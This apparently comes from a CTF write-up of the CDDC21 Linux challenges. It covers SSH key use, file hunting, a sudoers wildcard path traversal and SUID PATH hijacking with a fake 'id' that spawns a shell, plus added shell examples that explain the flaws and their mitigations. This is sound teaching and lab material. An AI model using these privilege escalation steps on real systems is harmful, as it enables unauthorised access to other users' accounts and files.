Zeyu's CTF Writeups - DSTA BrainHack CDDC21

Linux Rules the World! (Linux)

Lock and Key

We are given a private RSA key file. We can use ssh-keygen -p to change the passphrase.

root@no:~/Downloads# chmod 600 cybot01_bot1.key 
root@no:~/Downloads# ssh-keygen -p -f cybot01_bot1.key 
Key has comment 'bot1@ip-172-31-34-218'
Enter new passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved with the new passphrase.
root@no:~/Downloads# ssh -i cybot01_bot1.key bot1@13.213.91.240

Once in, the flag is in the home directory.

CDDC21{b0t_eNtR3nC3}

License to Run

The challenge description hinted at some malicious file that can be run. I looked for all the files that were executable by bot2, and found an interesting file in the home directory.

bot2@cybot01:/$ find / -executable -type f 2>/dev/null | grep flag
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-headers-5.4.0-1045/tools/perf/trace/beauty/rename_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/move_mount_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/mmap_flags.sh
/usr/src/linux-aws-5.8-headers-5.8.0-1035/tools/perf/trace/beauty/rename_flags.sh
/home/bot2/.#flag$!!1

Running this file gives us the flag.

bot2@cybot01:~$ ./.#flag\$\!\!1 
CDDC21{TH4nKsF0R_p3RM}

Historian

In the .viminfo file, a secret file location is revealed. The /usr/local/share/secret file contains the flag.

bot3@cybot01:~$ ls -la
total 24
dr-xr-x---  2 root bot3 4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5 4096 Jun 18 09:51 ..
lrwxrwxrwx  1 root root    9 Jun 18 09:51 .bash_history -> /dev/null
-r--r-----  1 bot3 bot3  220 Feb 25  2020 .bash_logout
-r--r-----  1 bot3 bot3 3771 Feb 25  2020 .bashrc
-r--r-----  1 bot3 bot3  807 Feb 25  2020 .profile
-rwx------  1 bot3 root  794 Jun 23 10:34 .viminfo

bot3@cybot01:~$ cat .viminfo
...

# File marks:
'0  1  15  /usr/local/share/secret
4,48,1,15,1620820231,"/usr/local/share/secret'

...

bot3@cybot01:~$ cat /usr/local/share/secret
CDDC21{V1m_th3_s4vior}

Line Inspection

There is a random-secrets file with lots of gibberish. Grepping the CDDC substring gives us the flag.

bot4@cybot01:~$ cat random-secrets | grep CDDC
CDDC21{gRe3EpL1nG}

Super

We are allowed to run /usr/bin/cat /var/log/* as bot6 with no password.

bot5@cybot01:~$ sudo -l
Matching Defaults entries for bot5 on cybot01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bot5 may run the following commands on cybot01:
    (bot6 : bot6) NOPASSWD: /usr/bin/cat /var/log/*

The glob in the sudoers rule is matched against the argument as a plain string, not against a resolved path, so a .. traversal that still begins with /var/log/ is accepted. We can use path traversal to read the flag as bot6:

bot5@cybot01:~$ sudo -u bot6 cat /var/log/../../../home/bot5/flag.txt
CDDC21{b3w4r3sud03rz}
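
To see why the sudoers glob lets the traversal through, here is an added example (my own code, not the writeup's or the challenge's) that mimics sudoers-style argument matching in POSIX sh next to a wrapper that normalises the path before allowing it; the function names are assumptions.

```sh
#!/bin/sh
# Added example, not code from the writeup or the challenge. It contrasts how
# the sudoers rule "(bot6) NOPASSWD: /usr/bin/cat /var/log/*" matches its
# argument with a wrapper that normalises the path before allowing it.

# sudoers-style check: the argument is compared to the glob as a plain
# string. In pattern context "*" also matches "/" and "..", so the traversal
# "/var/log/../../../home/bot5/flag.txt" is accepted.
sudoers_style_match() {
    case "$1" in
        /var/log/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Collapse "." and ".." components of an absolute path (pure POSIX sh; a
# production wrapper should also resolve symlinks, e.g. with realpath).
normalize_path() {
    old_ifs=$IFS; IFS=/
    set -f; set -- $1; set +f
    IFS=$old_ifs
    out=""
    for part in "$@"; do
        case "$part" in
            ""|.) ;;
            ..) out=${out%/*} ;;
            *) out="$out/$part" ;;
        esac
    done
    printf '%s\n' "${out:-/}"
}

# Hardened check: normalise first, then require the result to stay below
# /var/log/. This is the step the sudoers glob never performs.
safe_log_path() {
    case "$1" in /*) ;; *) return 1 ;; esac   # absolute paths only
    case "$(normalize_path "$1")" in
        /var/log/*) return 0 ;;
        *) return 1 ;;
    esac
}

# What a sudoers rule could point at instead of bare cat: refuses anything
# that escapes /var/log after normalisation.
safe_cat_log() {
    safe_log_path "$1" || { echo "refused: $1" >&2; return 1; }
    cat -- "$(normalize_path "$1")"
}
```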

Path to Win

There is a systeminfo binary in the home directory.

bot6@cybot01:~$ ls -la
total 44
dr-xr-x---  2 root bot6  4096 Jun 18 09:51 .
drwxr-xr-x 10 root bot5  4096 Jun 18 09:51 ..
lrwxrwxrwx  1 root root     9 Jun 18 09:51 .bash_history -> /dev/null
-r--r-----  1 bot6 bot6   220 Feb 25  2020 .bash_logout
-r--r-----  1 bot6 bot6  3771 Feb 25  2020 .bashrc
-r--r-----  1 bot6 bot6   807 Feb 25  2020 .profile
-r--------  1 bot7 root    31 Jun 18 09:51 flag.txt
-r-sr-xr-x  1 bot7 root 17008 Jun 18 09:51 systeminfo

Running it gives the following output.

bot6@cybot01:~$ ./systeminfo
System information...

[*] Date:
Wed Jun 23 15:06:18 UTC 2021

[*] Kernel:
5.8.0-1035-aws

[*] User infomation:
uid=1007(bot7) gid=1006(bot6) groups=1006(bot6),1005(bot5)

We can deduce that the systeminfo binary calls id. Since systeminfo is SUID and owned by bot7, it runs as bot7. If it invokes id by a bare name rather than an absolute path, the lookup goes through our PATH, so we can put a directory we control first in PATH and have our own id run in its place.

We drop a fake id into /tmp, make it executable, prepend /tmp to PATH and run systeminfo again. This time, instead of printing the id output, it drops us into a shell as bot7, which can read flag.txt.

bot6@cybot01:~$ cd /tmp
bot6@cybot01:/tmp$ echo /bin/sh > id
bot6@cybot01:/tmp$ chmod 777 id
bot6@cybot01:/tmp$ export PATH=/tmp:$PATH
bot6@cybot01:/tmp$ /home/bot6/systeminfo
System information...

[*] Date:
Wed Jun 23 15:07:48 UTC 2021

[*] Kernel:
5.8.0-1035-aws

[*] User infomation:
$ pwd
/tmp
$ cd /home/bot6
$ cat flag.txt
CDDC21{SU!d_!s_Qu!Te_DngeRouS}
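
As an added illustration (my own code, not the challenge binary or the writeup's), the following POSIX sh models the PATH lookup that a bare id inside a SUID program goes through, and shows the shell-side mitigation of pinning PATH to a trusted value before resolving a command, the counterpart of calling /usr/bin/id by absolute path; the sandbox directories and function names are constructed here.

```sh
#!/bin/sh
# Added example, not from the writeup or the challenge. It models the lookup
# that makes a bare "id" inside a SUID binary hijackable and shows the
# shell-side mitigation of pinning PATH before resolving a command.
# Everything it touches lives in a temporary sandbox created below.

# Return the first executable named $1 found in the colon-separated $2,
# i.e. the order sh and execvp(3) use for an unqualified command name.
first_in_path() {
    name=$1
    old_ifs=$IFS; IFS=:
    set -f; set -- $2; set +f
    IFS=$old_ifs
    for d in "$@"; do
        if [ -f "$d/$name" ] && [ -x "$d/$name" ]; then
            printf '%s\n' "$d/$name"
            return 0
        fi
    done
    return 1
}

# Mitigation: resolve against a fixed trusted PATH (the libc default from
# getconf, with a fallback), ignoring whatever the caller exported.
trusted_resolve() {
    saved_path=$PATH
    PATH=$(getconf PATH 2>/dev/null || echo /usr/sbin:/usr/bin:/sbin:/bin)
    if resolved=$(command -v "$1"); then
        PATH=$saved_path; printf '%s\n' "$resolved"; return 0
    fi
    PATH=$saved_path
    return 1
}

# Constructed sandbox: a writable "attacker" directory, as /tmp is in the
# writeup, and a stand-in for the system directory that really holds id.
sandbox=$(mktemp -d)
mkdir -p "$sandbox/attacker" "$sandbox/system"
printf '#!/bin/sh\necho hijacked\n' > "$sandbox/attacker/id"
printf '#!/bin/sh\necho "uid=1007(bot7)"\n' > "$sandbox/system/id"
chmod 755 "$sandbox/attacker/id" "$sandbox/system/id"

# PATH as the victim process inherits it (attacker dir first) vs. pinned.
hijacked_path="$sandbox/attacker:$sandbox/system"
pinned_path="$sandbox/system"
```

Remove the sandbox with rm -rf "$sandbox" when done.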